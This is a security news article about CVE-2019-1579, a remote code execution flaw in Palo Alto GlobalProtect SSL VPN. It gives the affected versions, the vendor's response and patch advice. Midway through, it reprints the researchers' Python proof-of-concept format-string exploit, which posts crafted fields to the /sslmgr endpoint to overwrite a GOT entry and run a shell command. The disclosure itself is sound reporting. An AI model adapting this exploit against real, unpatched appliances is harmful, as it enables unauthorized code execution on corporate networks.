Company Palo Alto Networks quietly fixed the critical vulnerability in its corporate SSL GlobalProtect SSL VPN solution implemented in Palo Alto firewalls.
Exploiting the vulnerability allowed attackers remotely execute an arbitrary code. Vulnerability (CVE-2019-1579) affecting the GlobalProtect solution and the GlobalProtect Gateway interface can be exploited by an unauthorized attacker by sending a specially crafted request to the device.Security researchers Orange Tsai and Meh Chang discovered the bug.
“We surveyed all Palo Alto SSL VPN over the world to see if there is any large corporations using the vulnerable GlobalProtect, and Uber is one of them!”, — said researchers.
Uber took a very quick response and right step to fix the vulnerability.
Affect versions:
According to our survey, all the GlobalProtect before July 2018 are vulnerable! Here is the affect version list:
- Palo Alto GlobalProtect SSL VPN 7.1.x < 7.1.19
- Palo Alto GlobalProtect SSL VPN 8.0.x < 8.0.12
- Palo Alto GlobalProtect SSL VPN 8.1.x < 8.1.3
PoC-code:
Experts published the PoC-code to demonstrate the process of exploiting the vulnerability.
#!/usr/bin/python import requests from pwn import * url = "https://sslvpn/sslmgr" cmd = "echo pwned > /var/appweb/sslvpndocs/hacked.txt" strlen_GOT = 0x667788 # change me system_plt = 0x445566 # change me fmt = '%70$n' fmt += '%' + str((system_plt>>16)&0xff) + 'c' fmt += '%32$hn' fmt += '%' + str((system_plt&0xffff)-((system_plt>>16)&0xff)) + 'c' fmt += '%24$hn' for i in range(40,60): fmt += '%'+str(i)+'$p' data = "scep-profile-name=" data += p32(strlen_GOT)[:-1] data += "&appauthcookie=" data += p32(strlen_GOT+2)[:-1] data += "&host-id=" data += p32(strlen_GOT+4)[:-1] data += "&user-email=" data += fmt data += "&appauthcookie=" data += cmd r = requests.post(url, data=data)
Read also: Drupal fixed a critical vulnerability that could be used to hijack sites
How to fix?
When researchers reported about this bug in Palo Alto Networks, however, they got the following reply:
“Thanks for the submission. Palo Alto Networks does follow coordinated vulnerability disclosure for security vulnerabilities that are reported to us by external researchers. We do not CVE items found internally and fixed. This issue was previously fixed, but if you find something in a current version, please let us know”, — commented in Palo Alto Networks.
So, it seems, this vulnerability is known for Palo Alto, but not ready for the world.
Administrators are urged to upgrade to PAN-OS versions 7.1.19 and higher, 8.0.12 and higher, 8.1.3 and later.